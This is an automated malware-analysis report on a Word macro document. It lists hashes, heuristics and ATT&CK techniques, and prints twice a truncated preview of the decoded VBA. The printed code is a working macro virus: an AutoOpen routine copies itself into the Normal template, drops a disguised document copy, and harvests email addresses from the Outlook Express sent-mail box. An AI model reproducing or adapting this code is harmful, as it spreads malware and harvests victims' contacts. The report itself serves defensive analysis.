Office (OLE) malware analysis — malicious · 0c0ed076cc58a287

MALICIOUS

Office (OLE)

40.0 KB Created: 2000-08-23 21:22:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 3d8683eb5eec3af4e383bf49ae3ae74d SHA-1: b5c58662397f6a4f857cacab5a4417d0daef4c44 SHA-256: 0c0ed076cc58a2870d8c0a43ad9f02f7876d2faefe0387e97d68575b9aa21b0c

180 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains legacy WordBasic and VBA macros, with a critical heuristic firing for a Shell() call within the AutoOpen macro. The script attempts to copy itself to the Normal template and the active document, suggesting an attempt at persistence or propagation. The presence of a legacy AutoOpen marker and the use of Shell() indicate a malicious intent to execute arbitrary code.

Heuristics 5

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 24236 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	24236 bytes
SHA-256: `f185b0e754d0b860e6577cd82315e1f028168fafbb06bc7b40e960e91b9629d0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "AddString" 'The Microsoft Word Language Visual Basic 'Copyright (c) 1999 Microsoft 'Todos os direitos reservados Public pq As String Sub AutoOpen() Attribute AutoOpen.VB_Description = "Microsoft Word (c) 1999 Corporation\r\nInternet Mail" Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Web.AddString.AutoOpen" Call AddFile Call AddNew Call MailNew Call Verday End Sub Sub AddNew() Attribute AddNew.VB_Description = "Microsoft Word (c) 1999 Corporation\r\nInternet Mail" Attribute AddNew.VB_ProcData.VB_Invoke_Func = "Web.AddString.AddNew" Dim exec exec = Counter() On Error GoTo 0 Open pq + "\Death Kiss.Ini" For Output As #1 Print #1, exec + 1 Close #1 Doc = ActiveDocument.Path + "\" + ActiveDocument.Name dot = NormalTemplate.FullName On Error Resume Next Application.OrganizerCopy Source:=Doc, _ Destination:=NormalTemplate.FullName, Name:="AddString", _ Object:=wdOrganizerObjectProjectItems Application.OrganizerCopy Source:=Doc, _ Destination:=NormalTemplate.FullName, Name:="AddMail", _ Object:=wdOrganizerObjectProjectItems On Error GoTo 0 On Error Resume Next Application.OrganizerCopy Source:=dot, _ Destination:=Doc, Name:="AddString", _ Object:=wdOrganizerObjectProjectItems Application.OrganizerCopy Source:=dot, _ Destination:=ActiveDocument.Name, Name:="AddMail", _ Object:=wdOrganizerObjectProjectItems On Error GoTo 0 End Sub Function Counter() Dim exec exec = "" On Error Resume Next Open pq + "\Death Kiss.Ini" For Input As #1 Input #1, exec Close #1 On Error GoTo 0 Counter = Val(exec) End Function Function AddFile() Dim meucar As String cdir = CurDir() On Error Resume Next ChDir "\" MkDir "\Windows" On Error GoTo 0 On Error Resume Next ChDir "\Windows" MkDir "Application Users" On Error GoTo 0 On Error Resume Next ChDir "\Windows\Application Users" MkDir "AddFile" On Error GoTo 0 ChDir cdir pq = "\Windows\Application Users\AddFile" On Error GoTo 0 p = ActiveDocument.Path + "\Pesquisa de Opinião.doc" If Counter() = 0 Then On Error Resume Next Open p For Binary As #1 Do While Meulocal < LOF(1) meucar = meucar & Input(2048, #1) Meulocal = Loc(1) Loop Close #1 Open pq + "\Pesquisa de Opinião.doc" For Binary Access Write As #1 Put #1, , meucar Close #1 On Error GoTo 0 End If End Function Attribute VB_Name = "AddMail" 'The Microsoft Word Language Visual Basic 'Copyright (c) 1999 Microsoft 'Todos os direitos reservados Sub MailNew() Attribute MailNew.VB_Description = "Microsoft Word (c) 1999 Corporation\r\nInternet Mail" Attribute MailNew.VB_ProcData.VB_Invoke_Func = "Web.AddMail.MailNew" Dim meucar, Meulocal Dim s As String Dim F As Long Dim correio, vetor(100) If Not Ismail() Then Exit Sub Else If Endmail() = "Yes" Then Exit Sub End If End If On Error Resume Next Open "c:\windows\application data\microsoft\outlook express\mail\Itens enviados.mbx" For Binary As #1 Do While Meulocal < LOF(1) meucar = meucar & Input(2048, #1) Meulocal = Loc(1) Loop Close #1 On Error GoTo 0 v = 0 c = 1 flag = True While flag c = InStr(c, meucar, "<") If c > 0 Then F = InStr(c, meucar, ">") s = Mid(meucar, c + 1, F - c - 1) Else flag = False End If If InStr(1, s, "@") > 0 Then vetor(v) = s v = v + 1 If v = 100 Then flag = False End If End If c = c + 1 Wend For Each minhatarefa In Tasks If v > 0 Then F = InStr(1, minhatarefa.Name, "-") If F > 0 Then c = Mid(minhatarefa.Name, F + 1) Else c = minhatarefa.Name End If If InStr(1, minhatarefa.Name, "Outlook Express") > 0 Then On Error Resume Next ... (truncated)

SHA-256: f185b0e754d0b860e6577cd82315e1f028168fafbb06bc7b40e960e91b9629d0

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AddString"
'The Microsoft Word Language Visual Basic
'Copyright (c) 1999 Microsoft
'Todos os direitos reservados
Public pq As String



Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Microsoft Word (c) 1999 Corporation\r\nInternet Mail"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Web.AddString.AutoOpen"
 Call AddFile
 Call AddNew
 Call MailNew
 Call Verday
End Sub
 
Sub AddNew()
Attribute AddNew.VB_Description = "Microsoft Word (c) 1999 Corporation\r\nInternet Mail"
Attribute AddNew.VB_ProcData.VB_Invoke_Func = "Web.AddString.AddNew"
Dim exec
exec = Counter()

On Error GoTo 0
Open pq + "\Death Kiss.Ini" For Output As #1
Print #1, exec + 1
Close #1

Doc = ActiveDocument.Path + "\" + ActiveDocument.Name
dot = NormalTemplate.FullName

On Error Resume Next

Application.OrganizerCopy Source:=Doc, _
       Destination:=NormalTemplate.FullName, Name:="AddString", _
       Object:=wdOrganizerObjectProjectItems

Application.OrganizerCopy Source:=Doc, _
       Destination:=NormalTemplate.FullName, Name:="AddMail", _
       Object:=wdOrganizerObjectProjectItems

On Error GoTo 0
On Error Resume Next

Application.OrganizerCopy Source:=dot, _
       Destination:=Doc, Name:="AddString", _
       Object:=wdOrganizerObjectProjectItems

Application.OrganizerCopy Source:=dot, _
       Destination:=ActiveDocument.Name, Name:="AddMail", _
       Object:=wdOrganizerObjectProjectItems

On Error GoTo 0

End Sub

Function Counter()
Dim exec
exec = ""
On Error Resume Next
Open pq + "\Death Kiss.Ini" For Input As #1
Input #1, exec
Close #1
On Error GoTo 0
Counter = Val(exec)
End Function

Function AddFile()
Dim meucar As String
cdir = CurDir()

On Error Resume Next
  ChDir "\"
  MkDir "\Windows"
On Error GoTo 0

On Error Resume Next
ChDir "\Windows"
MkDir "Application Users"
On Error GoTo 0

On Error Resume Next
ChDir "\Windows\Application Users"
MkDir "AddFile"
On Error GoTo 0

ChDir cdir
pq = "\Windows\Application Users\AddFile"
On Error GoTo 0

p = ActiveDocument.Path + "\Pesquisa de Opinião.doc"

If Counter() = 0 Then
   On Error Resume Next
   Open p For Binary As #1
   Do While Meulocal < LOF(1)
       meucar = meucar & Input(2048, #1)
       Meulocal = Loc(1)
   Loop
   Close #1

   Open pq + "\Pesquisa de Opinião.doc" For Binary Access Write As #1
   Put #1, , meucar
   Close #1
   On Error GoTo 0
End If
End Function


Attribute VB_Name = "AddMail"

'The Microsoft Word Language Visual Basic
'Copyright (c) 1999 Microsoft
'Todos os direitos reservados

Sub MailNew()
Attribute MailNew.VB_Description = "Microsoft Word (c) 1999 Corporation\r\nInternet Mail"
Attribute MailNew.VB_ProcData.VB_Invoke_Func = "Web.AddMail.MailNew"
Dim meucar, Meulocal
Dim s As String
Dim F As Long
Dim correio, vetor(100)

If Not Ismail() Then
  Exit Sub
  Else
   If Endmail() = "Yes" Then
     Exit Sub
   End If
End If

On Error Resume Next
Open "c:\windows\application data\microsoft\outlook express\mail\Itens enviados.mbx" For Binary As #1
Do While Meulocal < LOF(1)
    meucar = meucar & Input(2048, #1)
    Meulocal = Loc(1)
Loop
Close #1
On Error GoTo 0

v = 0
c = 1
flag = True

While flag
c = InStr(c, meucar, "<")

If c > 0 Then
F = InStr(c, meucar, ">")
s = Mid(meucar, c + 1, F - c - 1)
Else
flag = False
End If

If InStr(1, s, "@") > 0 Then
vetor(v) = s
v = v + 1
If v = 100 Then
   flag = False
End If

End If
c = c + 1
Wend

For Each minhatarefa In Tasks
  If v > 0 Then
    F = InStr(1, minhatarefa.Name, "-")
    If F > 0 Then
       c = Mid(minhatarefa.Name, F + 1)
      Else
       c = minhatarefa.Name
    End If
    
    If InStr(1, minhatarefa.Name, "Outlook Express") > 0 Then
        On Error Resume Next
        
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.